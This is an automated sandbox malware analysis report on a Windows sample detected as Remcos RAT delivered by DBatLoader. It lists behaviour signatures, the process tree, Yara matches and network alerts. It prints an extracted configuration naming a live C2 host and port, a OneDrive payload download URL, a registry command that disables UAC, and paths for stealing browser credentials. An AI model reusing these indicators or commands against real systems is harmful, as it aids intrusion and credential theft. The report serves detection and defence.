Windows Analysis Report
XY2I8rWLkM.exe

Overview

General Information

Sample name: XY2I8rWLkM.exe (renamed because the original name is a hash value)
Original sample name: 29af19382bdeadee6d93b98f354e703d.exe
Analysis ID: 1428364
MD5: 29af19382bdeadee6d93b98f354e703d
SHA1: 3d38885812aa0c910025d86e05287600c745f5c8
SHA256: 8a005601e52341e8aff3c95cf30f4ede6b874d2b7e6ffdb9afda9425733fc5d7
Tags: exe, RAT, RemcosRAT

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Snort IDS alert for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Creation with Colorcpl
Uses dynamic DNS services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormally high CPU usage
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate processes and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • XY2I8rWLkM.exe (PID: 1436 cmdline: "C:\Users\user\Desktop\XY2I8rWLkM.exe" MD5: 29AF19382BDEADEE6D93B98F354E703D)
    • cmd.exe (PID: 3452 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OcihlomcO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 2108 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\XY2I8rWLkM.exe C:\\Users\\Public\\Libraries\\Ocihlomc.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • colorcpl.exe (PID: 2800 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
      • conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Ocihlomc.PIF (PID: 6544 cmdline: "C:\Users\Public\Libraries\Ocihlomc.PIF" MD5: 29AF19382BDEADEE6D93B98F354E703D)
    • SndVol.exe (PID: 2380 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Ocihlomc.PIF (PID: 3012 cmdline: "C:\Users\Public\Libraries\Ocihlomc.PIF" MD5: 29AF19382BDEADEE6D93B98F354E703D)
    • colorcpl.exe (PID: 6164 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Host:Port:Password": "jantis.duckdns.org:1188:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TALGAI", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\ProgramData\ffrrdds\logs.dat, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: C:\Users\Public\Libraries\OcihlomcO.bat, Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Author: ditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x5b:$s2: :~41,1%%
  • 0x67:$s2: :~47,1%%
  • 0x73:$s2: :~6,1%%
  • 0x7e:$s2: :~53,1%%
  • 0x8a:$s2: :~1,1%
  • 0x9b:$s2: :~10,1%%
  • 0xa7:$s2: :~39,1%%
  • 0xb3:$s2: :~16,1%%
  • 0xbf:$s2: :~13,1%%
  • 0xcb:$s2: :~25,1%%
  • 0xd7:$s2: :~53,1%%
  • 0xe3:$s2: :~42,1%%
  • 0xef:$s2: :~22,1%%
  • 0xfb:$s2: :~18,1%%
  • 0x107:$s2: :~48,1%%
  • 0x113:$s2: :~51,1%%
  • 0x11f:$s2: :~2,1%%
  • 0x12a:$s2: :~61,1%%
  • 0x136:$s2: :~9,1%%
  • 0x141:$s2: :~19,1%%
Source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security
Source: 00000007.00000002.2154857966.0000000002AE1000.00000020.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security
Source: 00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 0000000A.00000002.2212258273.00000000029B1000.00000020.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security
(28 further entries not shown)
Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Author: unknown
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown
  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6656c:$str_b2: Executing file:
  • 0x675ec:$str_b3: GetDirectListeningPort
  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67118:$str_b7: \update.vbs
  • 0x66594:$str_b9: Downloaded file:
  • 0x66580:$str_b10: Downloading file:
  • 0x66624:$str_b12: Failed to upload file:
  • 0x675b4:$str_b13: StartForward
  • 0x675d4:$str_b14: StopForward
  • 0x67070:$str_b15: fso.DeleteFile "
  • 0x67004:$str_b16: On Error Resume Next
  • 0x670a0:$str_b17: fso.DeleteFolder "
  • 0x66614:$str_b18: Uploaded file:
  • 0x665d4:$str_b19: Unable to delete:
  • 0x67038:$str_b20: while fso.FileExists("
  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6637c:$s1: CoGetObject
  • 0x66390:$s1: CoGetObject
  • 0x663ac:$s1: CoGetObject
  • 0x70338:$s1: CoGetObject
  • 0x6633c:$s2: Elevation:Administrator!new:
(58 further entries not shown)

                  System Summary

                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Ocihlomc.PIF" , CommandLine: "C:\Users\Public\Libraries\Ocihlomc.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Ocihlomc.PIF, NewProcessName: C:\Users\Public\Libraries\Ocihlomc.PIF, OriginalFileName: C:\Users\Public\Libraries\Ocihlomc.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Ocihlomc.PIF" , ProcessId: 6544, ProcessName: Ocihlomc.PIF
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Ocihlomc.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XY2I8rWLkM.exe, ProcessId: 1436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ocihlomc
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 2800, TargetFilename: \Device\ConDrv\\Connect
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Ocihlomc.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XY2I8rWLkM.exe, ProcessId: 1436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ocihlomc
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Ocihlomc.PIF" , CommandLine: "C:\Users\Public\Libraries\Ocihlomc.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Ocihlomc.PIF, NewProcessName: C:\Users\Public\Libraries\Ocihlomc.PIF, OriginalFileName: C:\Users\Public\Libraries\Ocihlomc.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Ocihlomc.PIF" , ProcessId: 6544, ProcessName: Ocihlomc.PIF

                  Stealing of Sensitive Information

                  Source: Registry Key setAuthor: Joe Security: Data: Details: 69 C5 7C 24 5C CE D8 EB 10 90 88 40 CA B7 66 13 EF 52 F0 2D E4 CC 0A D2 71 54 A9 F1 F5 5B 65 F7 DC 39 28 C8 42 5F 80 AD 25 33 BA 77 6D 96 A3 A4 79 9E 1C 74 3A CC 2B 3A 01 A8 21 6D 00 D5 D6 21 63 E6 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 2800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-TALGAI\exepath
                  Timestamp: 04/18/24-21:26:56.124863
                  SID: 2032776
                  Source Port: 49707
                  Destination Port: 1188
                  Protocol: TCP
                  Classtype: A Network Trojan was detected

                  Timestamp: 04/18/24-21:29:11.385348
                  SID: 2032777
                  Source Port: 1188
                  Destination Port: 49707
                  Protocol: TCP
                  Classtype: A Network Trojan was detected

                  AV Detection

                  Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                  Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                  Source: C:\Users\Public\Libraries\netutils.dllAvira: detection malicious, Label: TR/AVI.Agent.rqsyc
                  Source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "jantis.duckdns.org:1188:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TALGAI", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFReversingLabs: Detection: 52%
                  Source: C:\Users\Public\Libraries\netutils.dllReversingLabs: Detection: 44%
                  Source: XY2I8rWLkM.exeReversingLabs: Detection: 52%
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\ffrrdds\logs.dat, type: DROPPED
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFJoe Sandbox ML: detected
                  Source: XY2I8rWLkM.exeJoe Sandbox ML: detected
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04693837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_04693837
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C663837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_1C663837
                  Source: colorcpl.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                  Exploits

                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTR

                  Privilege Escalation

                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046674FD _wcslen,CoGetObject,5_2_046674FD
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6374FD _wcslen,CoGetObject,8_2_1C6374FD
                  Source: XY2I8rWLkM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
                  Source: Binary string: easinvoker.pdbH source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2037895391.0000000014C50000.00000004.00000020.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028A58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028A58CC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04669665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04669665
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04669253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04669253
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0467C291
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0466C34D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0466BD37
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046AE879 FindFirstFileExA,5_2_046AE879
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466783C FindFirstFileW,FindNextFileW,5_2_0466783C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_0466880C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04679AF5 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_04679AF5
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0466BB30
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_1C63BD37
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C67E879 FindFirstFileExA,8_2_1C67E879
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63783C FindFirstFileW,FindNextFileW,8_2_1C63783C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_1C63880C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C649AF5 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_1C649AF5
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_1C63BB30
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C639665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_1C639665
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C639253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_1C639253
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C64C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_1C64C291
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_1C63C34D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04667C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_04667C97

                  Networking

                  Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49707 -> 103.186.117.171:1188
                  Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 103.186.117.171:1188 -> 192.168.2.5:49707
                  Source: Malware configuration extractorURLs: jantis.duckdns.org
                  Source: unknownDNS query: name: jantis.duckdns.org
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028BC8AC InternetCheckConnectionA,0_2_028BC8AC
                  Source: global trafficTCP traffic: 192.168.2.5:49707 -> 103.186.117.171:1188
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global trafficHTTP traffic detected: GET /download?resid=38773C188FECDED2%21107&authkey=!APdTZ0yd8fEkIVs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,5_2_0467B380
                  Source: global trafficHTTP traffic detected: GET /download?resid=38773C188FECDED2%21107&authkey=!APdTZ0yd8fEkIVs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
